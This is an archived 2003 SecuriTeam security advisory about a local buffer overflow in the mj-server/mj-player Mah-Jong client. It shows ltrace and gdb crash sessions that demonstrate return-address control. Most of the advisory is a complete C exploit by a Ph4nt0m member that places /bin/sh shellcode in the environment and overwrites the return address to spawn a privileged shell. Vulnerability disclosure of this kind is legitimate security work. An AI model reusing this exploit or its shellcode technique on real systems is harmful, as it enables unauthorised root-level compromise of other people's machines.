[UNIX] mj-server Long Hostname Buffer Overflow (client)

From: SecuriTeam (support_at_securiteam.com)
Date: 09/29/03

  • Next message: SecuriTeam: "[NT] mIRC USERHOST Buffer Overflow"
    To: list@securiteam.com
    Date: 29 Sep 2003 12:57:04 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      mj-server Long Hostname Buffer Overflow (client)
    ------------------------------------------------------------------------

    SUMMARY

    xmj, mj-server, mj-player are programs used for playing Mah-Jong. A
    locally exploitable buffer overflow has been found in the mj-server
    allowing local attackers to gain gid root privileges. This is done by
    overflowing one of the program's client side parameters.

    DETAILS

    Example:
    [root@localhost mj-1.4-src]# ltrace ./mj-player --server
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    __libc_start_main(0x08048fd2, 3, 0xbffff964, 0x08048a98, 0x08063d70
    <unfinished
    ..>
    strcmp("--server", "--id") = 1
    strcmp("--server", "--server") = 0
    time(NULL) = 1063103272
    srand(0x3f5dab28, 0x08063f1e, 1763, 2114, 1014) = 0
    strchr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., ':') = NULL
    strcpy(0xbffff0d2, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...) = 0xbffff0d2
    socket(1, 1, 0) = 3
    connect(3, 0xbffff0d0, 110, 0xbffff0d2, 0) = -1
    perror("connect_to_host: connect failed") = <void>
    connect_to_host: connect failed: No such file or directory
    perror("client_init: connect_to_host fai"...) = <void>
    client_init: connect_to_host failed: Illegal seek
    exit(1) = <void>
    +++ exited (status 1) +++
    [root@localhost mj-1.4-src]# ltrace ./mj-player --server
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAA
    __libc_start_main(0x08048fd2, 3, 0xbffff8f4, 0x08048a98, 0x08063d70
    <unfinished
    ..>
    strcmp("--server", "--id") = 1
    strcmp("--server", "--server") = 0
    time(NULL) = 1063103280
    srand(0x3f5dab30, 0x08063f1e, 1763, 2114, 1014) = 0
    strchr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., ':') = NULL
    strcpy(0xbffff062, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...) = 0xbffff062
    socket(1, 1, 0) = 3
    connect(3, 0xbffff060, 110, 0xbffff062, 0) = -1
    perror("connect_to_host: connect failed") = <void>
    connect_to_host: connect failed: Connection refused
    - --- SIGSEGV (Segmentation fault) ---
    +++ killed by SIGSEGV +++
    [root@localhost mj-1.4-src]# gdb ./mj-player
    GNU gdb Red Hat Linux (5.2.1-4)
    Copyright 2002 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you
    are
    welcome to change it and/or distribute copies of it under certain
    conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for details.

    This GDB was configured as "i386-redhat-linux"...
    (gdb) r --server
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAA
    Starting program: /home/mj-1.4-src/mj-player --server
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAA
    connect_to_host: connect failed: Connection refused

    Program received signal SIGSEGV, Segmentation fault.
    0x08004141 in ?? ()
    (gdb) r --server
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAA
    The program being debugged has been started already.
    Start it from the beginning? (y or n) y

    Starting program: /home/mj-1.4-src/mj-player --server
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAA
    connect_to_host: connect failed: Connection refused

    Program received signal SIGSEGV, Segmentation fault.
    0x41414141 in ?? ()
    (gdb)

    Exploit:
    /*
    * mj-server(client) local root(possible in debian) exploit
    * test in (redhat7.2----redhat8.0)
    * coded by jsk
    *
    * (c) Ph4nt0m Security Team /www.ph4nt0m.org
    *
    */
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #define BUFSIZE 150

    char shellcode[] =
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x31xc0x31xdbxb0x17xcdx80xebx1fx5ex89x76x08x31"
    "xc0x88x46x07x89x46x0cxb0x0bx89xf3x8dx4ex08x8d"
    "x56x0cxcdx80x31xdbx89xd8x40xcdx80xe8xdcxffxff"
    "xffx2fx62x69x6ex2fx73x68x58";
    void banner (void);

    void banner (void)
    {
    fprintf (stdout, "\n [+] mj-server local exploit mail:<jsk@ph4nt0m.net>");

    fprintf (stdout, "\n [+] by jsk < <a href="http://www.ph4nt0m.org"
    target="_blank"><a href="http://www.ph4nt0m.org" target="_blank"><a
    href="http://www.ph4nt0m.org" target="_blank">www.ph4nt0m.org</a></a></a>>
    talk with me <irc.0x557.org #ph4nt0m> ");
    fprintf (stdout, "\n [+] spawning shell \n\n");
    }

    int main(void)
    {
        char buf[BUFSIZE+16];
        char *prog[] = {"/home/mj-1.4-src/mj-server","--server", buf, NULL};
        char *env[] = {"HOME=jsk", shellcode, NULL};
        unsigned long ret = 0xc0000000 - sizeof(void *) - strlen(prog[0]) -
        strlen(shellcode) - 0x02;
        memset(buf,0x41,sizeof(buf));
        memcpy(buf+BUFSIZE,(char *)&ret,4);
        memcpy(buf+BUFSIZE+4,(char *)&ret,4);
        memcpy(buf+BUFSIZE+8,(char *)&ret,4);
        buf[BUFSIZE+12] = 0x00;
        printf("\n [+] Using address: 0x%x", ret);
        banner ();
        execve(prog[0],prog,env);
        return 0;
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:jsk@ph4nt0m.net> jsk.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] mIRC USERHOST Buffer Overflow"

    Relevant Pages

    • [UNIX] GBD UPX File Handling Buffer Overflow Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability has been reported in GDB, ... Copyright 2006 Free Software Foundation, ... There is absolutely no warranty for GDB. ...
      (Securiteam)
    • [UNIX] htget Remotely Exploitable Buffer Overflow (ReadLine)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... GNU gdb 6.3-debian ... There is absolutely no warranty for GDB. ... This GDB was configured as "i386-linux"...(no debugging symbols found) ...
      (Securiteam)
    • [EXPL] Citadel/UX Remote Buffer Overflow Exploit
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Citadel/UX Remote ... Listed below is a remote ... GNU gdb Red Hat Linux ...
      (Securiteam)
    • [UNIX] SoX Local Buffer Overflow Vulnerabilities (st_wavstartread)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... the program first reads 4 bytes from the .WAV file into a variable. ... GNU gdb 6.1-debian ... There is absolutely no warranty for GDB. ...
      (Securiteam)
    • [REVS] Format String Exploitation Demonstration (Linux)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... GNU gdb 6.5 ... Exit anyway? ... Our offset is 2. ...
      (Securiteam)